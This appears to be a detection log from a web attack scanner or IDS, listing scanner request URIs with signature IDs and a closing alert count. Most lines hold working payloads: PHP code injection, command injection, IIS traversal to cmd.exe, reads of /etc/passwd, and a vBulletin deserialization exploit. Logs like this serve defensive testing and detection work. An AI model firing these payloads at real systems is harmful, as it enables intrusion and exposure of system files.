Packet [704]	Uri [/web/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [705]	Uri [/web/postnuke/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [706]	Uri [/web/postnuke/html/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [707]	Uri [/web/modules/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [708]	Uri [/web/phpBB/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [709]	Uri [/web/forum/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [710]	Uri [/web/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [711]	Uri [/web/postnuke/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [712]	Uri [/web/postnuke/html/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [713]	Uri [/web/modules/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [714]	Uri [/web/phpBB/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [715]	Uri [/web/forum/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [716]	Uri [/web/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [717]	Uri [/web/postnuke/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [718]	Uri [/web/postnuke/html/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [719]	Uri [/web/modules/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [720]	Uri [/web/phpBB/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [721]	Uri [/web/forum/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [722]	Uri [/web/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [1]	Signatures	[300002802]
Packet [723]	Uri [/web/msadc/msadcs.dll]	Nattacks [1]	Signatures	[300001562]
Packet [725]	Uri [/web/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300001493]	[300002823]
Packet [726]	Uri [/web/forum/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300001493]	[300002823]
Packet [727]	Uri [/web/forums/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300001493]	[300002823]
Packet [728]	Uri [/web/forumz/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300001493]	[300002823]
Packet [729]	Uri [/web/htforum/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300001493]	[300002823]
Packet [730]	Uri [/web/board/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300001493]	[300002823]
Packet [731]	Uri [/web/community/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300001493]	[300002823]
Packet [732]	Uri [/web/vb/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300001493]	[300002823]
Packet [733]	Uri [/web/vbulletin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [4]	Signatures	[300000051]	[300000052]	[300001493]	[300002823]
Packet [734]	Uri [/web/_vti_bin/fpcount.exe]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [736]	Uri [/web/certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [737]	Uri [/web/cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [738]	Uri [/web/iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [739]	Uri [/web/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [740]	Uri [/web/pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [741]	Uri [/web/rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [742]	Uri [/web/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [743]	Uri [/web/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [744]	Uri [/web/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"]	Nattacks [2]	Signatures	[300000067]	[300001562]
Packet [745]	Uri [/web/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3]	Signatures	[300000067]	[300001562]	[300001897]
Packet [746]	Uri [/web/admin/system.php3?cmd=cat%20/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [748]	Uri [/web/admin/exec.php3?cmd=cat%20/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [750]	Uri [/web/isapi/tstisapi.dll]	Nattacks [1]	Signatures	[300001562]
Packet [751]	Uri [/web/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [1]	Signatures	[300001562]
Packet [752]	Uri [/web/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [1]	Signatures	[300001562]
Packet [753]	Uri [/web/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [1]	Signatures	[300001562]
Packet [754]	Uri [/web/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [1]	Signatures	[300001562]
Packet [755]	Uri [/web/pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [1]	Signatures	[300001562]
Packet [756]	Uri [/web/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [1]	Signatures	[300001562]
Packet [757]	Uri [/web/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [1]	Signatures	[300001562]
Packet [758]	Uri [/web/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver]	Nattacks [1]	Signatures	[300001562]
Packet [759]	Uri [/web/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2]	Signatures	[300001562]	[300001897]
Packet [760]	Uri [/web/ans.pl?p=../../../../../usr/bin/id|&blah]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001053]	[300001145]	[300001513]
Packet [761]	Uri [/web/ans/ans.pl?p=../../../../../usr/bin/id|&blah]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001053]	[300001145]	[300001513]
Packet [768]	Uri [/web/3rdparty/phpMyAdmin/server_sync.php?c=phpinfo()]	Nattacks [2]	Signatures	[300001871]	[300001888]
Packet [769]	Uri [/web/phpMyAdmin/server_sync.php?c=phpinfo()]	Nattacks [2]	Signatures	[300001871]	[300001888]
Packet [770]	Uri [/web/3rdparty/phpmyadmin/server_sync.php?c=phpinfo()]	Nattacks [3]	Signatures	[300001843]	[300001871]	[300001888]
Packet [771]	Uri [/web/phpmyadmin/server_sync.php?c=phpinfo()]	Nattacks [3]	Signatures	[300001843]	[300001871]	[300001888]
Packet [772]	Uri [/web/pma/server_sync.php?c=phpinfo()]	Nattacks [2]	Signatures	[300001871]	[300001888]
Packet [773]	Uri [/web/c99.php]	Nattacks [1]	Signatures	[300001907]
Packet [774]	Uri [/web/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26cat%20%22/etc/passwd%22%26]	Nattacks [1]	Signatures	[300001559]
Packet [801]	Uri [/web/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3]	Signatures	[300000051]	[300001871]	[300002794]
Packet [802]	Uri [/web/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3]	Signatures	[300000051]	[300001871]	[300002794]
Packet [803]	Uri [/web/phpmoadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3]	Signatures	[300000051]	[300001871]	[300002794]
Packet [804]	Uri [/web/phpmoadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3]	Signatures	[300000051]	[300001871]	[300002794]
Packet [805]	Uri [/web/wu-moadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3]	Signatures	[300000051]	[300001871]	[300002794]
Packet [806]	Uri [/web/wu-moadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3]	Signatures	[300000051]	[300001871]	[300002794]
Packet [807]	Uri [/web/moadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3]	Signatures	[300000051]	[300001871]	[300002794]
Packet [808]	Uri [/web/moadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3]	Signatures	[300000051]	[300001871]	[300002794]
Packet [809]	Uri [/web/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3]	Signatures	[300000051]	[300001871]	[300002794]
Packet [810]	Uri [/web/phpmoadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3]	Signatures	[300000051]	[300001871]	[300002794]
Packet [811]	Uri [/web/wu-moadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3]	Signatures	[300000051]	[300001871]	[300002794]
Packet [812]	Uri [/web/moadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3]	Signatures	[300000051]	[300001871]	[300002794]
Packet [813]	Uri [/web/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3]	Signatures	[300000051]	[300001871]	[300002794]
Packet [814]	Uri [/web/phpmoadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3]	Signatures	[300000051]	[300001871]	[300002794]
Packet [815]	Uri [/web/wu-moadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3]	Signatures	[300000051]	[300001871]	[300002794]
Packet [816]	Uri [/web/moadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;]	Nattacks [3]	Signatures	[300000051]	[300001871]	[300002794]
Packet [818]	Uri [/web/vb/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D]	Nattacks [1]	Signatures	[300001359]
Packet [819]	Uri [/web/vbulletin/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D]	Nattacks [1]	Signatures	[300001359]
Packet [820]	Uri [/web/shell?cat%20/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [828]	Uri [/web/login.cgi?cli=aa%20aa%27cat%20/etc/hosts]	Nattacks [2]	Signatures	[300000052]	[300001513]
# N. packets [829], [285] with alerts, N. Alerts [408]
# Execution time: 0.134606 s
